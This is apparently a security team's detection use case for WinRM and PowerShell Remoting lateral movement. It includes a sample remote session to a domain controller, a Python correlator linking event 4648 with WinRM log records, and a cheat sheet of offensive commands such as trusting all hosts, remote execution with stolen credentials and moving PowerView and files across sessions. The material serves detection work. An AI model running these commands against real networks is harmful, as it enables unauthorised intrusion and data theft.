# UC0042: WinRM or PowerShell Remoting for Lateral Movement
## Summary

| ID | UC0042 |
|---|---|
| Brief Description | WinRM or PowerShell remoting for lateral movement. |
| Author | Alex@Cyberok |
| Creation Date | 2023/02/28 |
| Modification Date | 2023/02/28 |
| ATT&CK Techniques | |
| Tags | |
| Linked Response Playbooks | |
| Artifacts | |
## Description

WinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). It may be invoked with the winrm command or by any number of programs such as PowerShell, and it can be used as a method of remotely interacting with Windows Management Instrumentation.

Lateral movement combines two techniques: extraction of confidential information, and use of that information after gaining access.
## Attack mapping

| ARTIFACT | OBJECT | DESCRIPTION |
|---|---|---|
| Attack Prerequisites | | |
| Credentials | User's credentials (login and password) | Used as arguments for lateral movement actions |
| Side Observables | | |
| Remote Session | Remote session | Remote PowerShell session opened via WinRM |
## Attack results

A successful attack allows the attacker to execute commands on a remote host through the remote session.

| RESOURCE | DESCRIPTION |
|---|---|
| Attack Prerequisites | |
| Privileged Access | Compromised host with privileged access |
| Credential Access | Any user's credentials |
| Result Consequences | |
| Remote Code Execution | The attacker gains the ability to execute commands on the remote host |
## Attack progress

1) The attacker establishes a PSRemoting session from a compromised system to the domain controller a-dc01:

```powershell
New-PSSession -ComputerName dc-mantvydas -Credential (Get-Credential)

 Id Name   ComputerName ComputerType  State  ConfigurationName    Availability
 -- ----   ------------ ------------  -----  -----------------    ------------
  3 WinRM3 a-dc01       RemoteMachine Opened Microsoft.PowerShell Available

PS C:\Users\mantvydas> Enter-PSSession 3
[a-dc01]: PS C:\Users\aegorov\Documents> hostname
```
2) Note the process ancestry: on the host that initiated the connection, a 4648 event (logon attempted with explicit credentials) is logged, showing which process initiated it, the hostname it connected to and which account was used.

Additionally, on the host that initiated the connection, %SystemRoot%\System32\Winevt\Logs\Microsoft-Windows-WinRM%4Operational.evtx records some useful data for the task "WSMan Session initialize":

Since we entered a PowerShell shell on the remote system (Enter-PSSession), there is another interesting record showing the establishment of the remote shell; note that its ShellID corresponds to the Correlation ActivityID observed earlier:
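As an added illustration (not part of the original use case, nor any vendor's detection content), the following Python sketch correlates the three artifacts named in the steps above into one alert: a 4648 on the initiating host whose process is a PowerShell host, a WinRM Operational "WSMan Session initialize" record to the same destination shortly afterwards, and a shell-creation record whose ShellId equals that session's ActivityID. The sample events are constructed; the field names used for the WinRM Operational records (`task`, `Destination`, `ActivityID`, `ShellId`) and the GUID values are assumptions to be mapped onto whatever your evtx parser or SIEM emits.

```python
"""Correlate 4648 + WinRM session initialisation + shell creation into one alert.

Added example (not from the original page). The records below are CONSTRUCTED to
mirror the fields the use case names; WinRM field names are assumptions.
"""
from datetime import datetime, timedelta

# Process names treated as PowerShell hosts on the initiating side.
PS_HOSTS = ("powershell.exe", "pwsh.exe", "powershell_ise.exe")

SAMPLE_EVENTS = [
    # Security log on the initiating host WS01: logon with explicit credentials (4648).
    {"log": "Security", "event_id": 4648, "time": "2023-02-28T10:00:01", "host": "WS01",
     "SubjectUserName": "mantvydas", "TargetUserName": "aegorov", "TargetServerName": "a-dc01",
     "ProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    # WinRM Operational on WS01: client-side session initialisation (task name from the page).
    {"log": "Microsoft-Windows-WinRM/Operational", "task": "WSMan Session initialize",
     "time": "2023-02-28T10:00:02", "host": "WS01", "Destination": "a-dc01",
     "ActivityID": "{6a1c0f2e-0000-4000-8000-000000000001}"},   # constructed GUID
    # WinRM Operational on WS01: remote shell established; ShellId reuses the ActivityID.
    {"log": "Microsoft-Windows-WinRM/Operational", "task": "Shell creation",
     "time": "2023-02-28T10:00:03", "host": "WS01",
     "ShellId": "{6a1c0f2e-0000-4000-8000-000000000001}"},
    # Benign noise: a 4648 from a backup agent with no WinRM activity following it.
    {"log": "Security", "event_id": 4648, "time": "2023-02-28T10:05:00", "host": "WS01",
     "SubjectUserName": "SYSTEM", "TargetUserName": "svc_backup", "TargetServerName": "fs01",
     "ProcessName": r"C:\Program Files\BackupAgent\agent.exe"},
]


def _ts(event):
    return datetime.fromisoformat(event["time"])


def _within(later, earlier, seconds):
    """True when `later` happened at or after `earlier`, no more than `seconds` later."""
    delta = _ts(later) - _ts(earlier)
    return timedelta(0) <= delta <= timedelta(seconds=seconds)


def detect_winrm_lateral_movement(events, window_seconds=60):
    """Return one alert per 4648 from a PowerShell host that is followed, on the same
    source host and within the window, by a WinRM session initialisation to the same
    target. The alert is upgraded from stage 'session' to 'shell' when a shell-creation
    record reuses the session's ActivityID as its ShellId."""
    alerts = []
    for logon in events:
        if logon.get("event_id") != 4648:
            continue
        proc = logon["ProcessName"].lower().rsplit("\\", 1)[-1]
        if proc not in PS_HOSTS:
            continue  # explicit-credential logons by other tools are out of scope here
        target = logon["TargetServerName"].lower()
        if target in ("localhost", logon["host"].lower()):
            continue  # explicit credentials used locally, not a remote session
        session = next(
            (e for e in events
             if e.get("task") == "WSMan Session initialize"
             and e["host"] == logon["host"]
             and e.get("Destination", "").lower() == target
             and _within(e, logon, window_seconds)),
            None)
        if session is None:
            continue
        shell = next(
            (e for e in events
             if e.get("task") == "Shell creation"
             and e["host"] == session["host"]
             and e.get("ShellId") == session["ActivityID"]
             and _within(e, session, window_seconds)),
            None)
        alerts.append({
            "source_host": logon["host"],
            "initiating_process": proc,
            "subject": logon["SubjectUserName"],
            "account_used": logon["TargetUserName"],
            "target_host": target,
            "activity_id": session["ActivityID"],
            "stage": "shell" if shell else "session",
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_winrm_lateral_movement(SAMPLE_EVENTS):
        print(alert)
```

Run against the constructed sample the function returns a single alert for WS01 -> a-dc01 at stage "shell" and ignores the backup-agent 4648, because no WinRM session follows it. The ShellId-to-ActivityID join is what distinguishes an interactive Enter-PSSession from a session that was opened but never used; tune the window to the latency you actually observe between 4648 and session initialisation on your hosts.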
## Possible usage

### Empire

For engagements that use Empire, there is a PowerShell module that can execute code remotely over WinRM in order to expand access inside a network. The module requires local administrator credentials, a listener, an agent and a target host.

Post-exploitation commands can then be executed on the compromised host through the WinRM service.
### Additional Useful Commands

```powershell
# Enable PowerShell Remoting on the target (box needs to be compromised first)
Enable-PSRemoting -Force

# Check if a given system is listening on the WinRM port
Test-NetConnection <IP> -CommonTCPPort WINRM

# Trust all hosts
Set-Item WSMan:\localhost\Client\TrustedHosts -Value * -Force

# Check which hosts are trusted
Get-Item WSMan:\localhost\Client\TrustedHosts

# Execute a command on a remote host
Invoke-Command <host> -Credential $cred -ScriptBlock {Hostname}

# Interactive session with explicit credentials
Enter-PSSession <host> -Credential <domain>\<user>

# Interactive session using Kerberos
Enter-PSSession <host> -Authentication Kerberos

# Upload a file to the remote session
Copy-Item -Path C:\Temp\PowerView.ps1 -Destination C:\Temp\ -ToSession (Get-PSSession)

# Download a file from the remote session
Copy-Item -Path C:\Users\Administrator\Desktop\test.txt -Destination C:\Temp\ -FromSession (Get-PSSession)
```
## Attack diagram
## References

A look under the hood at PowerShell Remoting through a cross platform lens